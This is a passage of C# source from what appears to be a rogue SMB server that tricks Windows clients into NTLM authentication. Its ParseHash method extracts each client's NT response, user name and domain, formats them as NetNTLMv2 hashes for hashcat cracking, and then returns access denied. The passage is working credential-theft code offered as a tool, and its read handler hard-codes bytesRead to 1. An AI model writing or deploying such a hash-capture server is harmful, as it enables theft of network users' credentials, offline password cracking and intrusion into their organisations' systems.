private async Task ReadCallback(IAsyncResult asyncResult)
{
try
{
// Retrieve the state object and the handler socket
// from the asynchronous state object.
SMBPacket state = (SMBPacket)asyncResult.AsyncState;
Socket handler = state.Socket;
// Read data from the client socket.
int bytesRead = 1;//handler.EndReceive(ar);
if (bytesRead > 0)
{
if (state.Buffer[8].Equals(SMB2Commands.SMB1NegotiateToSMB2))
{
await NegotiateSMB1ToSMB2Response(state);
}
else if (state.Command.SequenceEqual(SMB2Commands.Request))
{
await NegotiateResponse(state);
}
else if (state.Command.SequenceEqual(SMB2Commands.NegotiateNTLM) && state.MessageID.SequenceEqual(new byte[] { 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }))
{
await NegotiateNTLMResponse(state);
}
else if (state.Command.SequenceEqual(SMB2Commands.NegotiateNTLM) && state.MessageID.SequenceEqual(new byte[] { 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }))
{
await ParseHash(state);
await SendAccessDenied(state);
if (handler.Connected)
{
handler.EndReceive(asyncResult);
handler.Shutdown(SocketShutdown.Both);
}
return;
}
try
{
handler.BeginReceive(state.Buffer, 0, SMBPacket.BUFFER_SIZE, 0,
new AsyncCallback(async(ar) => await ReadCallback(ar)), state);
}
catch (ObjectDisposedException)
{
}
}
}
catch (SocketException e)
{
await Controller.Log(Name, e.Message);
}
}
private async Task NegotiateSMB1ToSMB2Response(SMBPacket packet)
{
try
{
var header = new SMB2Header(new byte[] { 0x00, 0x00 });
var data = new SMB2NegotiateResponse(header.Build()).Build();
await Send(packet.Socket, data);
}
catch (Exception e)
{
await Controller.Log(Name, e.ToString());
}
}
private async Task ParseHash(SMBPacket packet)
{
var auth = packet.Buffer.Skip(113).ToArray();
short lmHashLen = BitConverter.ToInt16(auth, 12);
short lmHashOffset = BitConverter.ToInt16(auth, 16);
var lmHash = BitConverter.ToString(auth.Skip(lmHashOffset).Take(lmHashLen).ToArray()).Replace("-", "");
var ntHashLen = BitConverter.ToInt16(auth, 22);
short ntHashOffset = BitConverter.ToInt16(auth, 24);;
var ntHash = BitConverter.ToString(auth.Skip(ntHashOffset).Take(ntHashLen).ToArray()).Replace("-", "");
short domainLen = BitConverter.ToInt16(auth, 30);
short domainOffset = BitConverter.ToInt16(auth, 32);
string domain = Encoding.Unicode.GetString(auth.Skip(domainOffset).Take(domainLen).ToArray());
short userLen = BitConverter.ToInt16(auth, 38);
short userOffset = BitConverter.ToInt16(auth, 40);
string user = Encoding.Unicode.GetString(auth.Skip(userOffset).Take(userLen).ToArray());
await Controller.Add(Name, new User
{
IPAddress = (packet.Socket.RemoteEndPoint as IPEndPoint).Address.ToString(),
Username = user,
Hash = "NetNTLMv2",
HashcatFormat = string.Format(
"{0}::{1}:{2}:{3}:{4}",
user,
domain,
"6769766563707223",
string.Concat(ntHash.Take(32)),
string.Concat(ntHash.Skip(32))
)
});
/*
* await Controller.Add(Name, new User
* {
* IPAddress = context.Request.RemoteEndPoint.Address.ToString(),
* Username = user,
* Hash = string.Format("{0}:{1}", String.Concat(ntHash.Take(32)), string.Concat(ntHash.Skip(32))),
* HashcatFormat = ""
* }); */
}
private async Task SendAccessDenied(SMBPacket packet)
{
try
{
var header = new SMB2Header(
new byte[] { 0x01, 0x00 },
packet.MessageID,
packet.CreditCharge,
packet.Credits,
new byte[] { 0xff, 0xfe, 0x00, 0x00 },
packet.SessionID,
new byte[] { 0x22, 0x00, 0x00, 0xc0 }
);
var data = new SMB2AccessDenied(header.Build()).Build();
await Send(packet.Socket, data);
}
catch (Exception e)
{
await Controller.Log(Name, e.ToString());
}
}
private async Task NegotiateResponse(SMBPacket packet)
{
try
{
var header = new SMB2Header(
new byte[] { 0x00, 0x00 },
packet.MessageID,
packet.CreditCharge,
packet.Credits,
packet.ProcessID
);
var data = new SMB2NegotiateResponse(
header.Build(),
new byte[] { 0x10, 0x02 }).Build();
await Send(packet.Socket, data);
}
catch (Exception e)
{
await Controller.Log(Name, e.ToString());
}
}
private async Task AcceptCallback(IAsyncResult asyncResult)
{
try
{
// Signal the main thread to continue.
mre.Set();
// Get the socket that handles the client request.
Socket listener = (Socket)asyncResult.AsyncState;
Socket handler = listener.EndAccept(asyncResult);
// Create the state object.
SMBPacket state = new SMBPacket();
state.Socket = handler;
handler.BeginReceive(state.Buffer, 0, SMBPacket.BUFFER_SIZE, 0,
new AsyncCallback(async(ar) => await ReadCallback(ar)), state);
await Task.CompletedTask;
}
catch (Exception e)
{
await Controller.Log(Name, e.ToString());
}
}
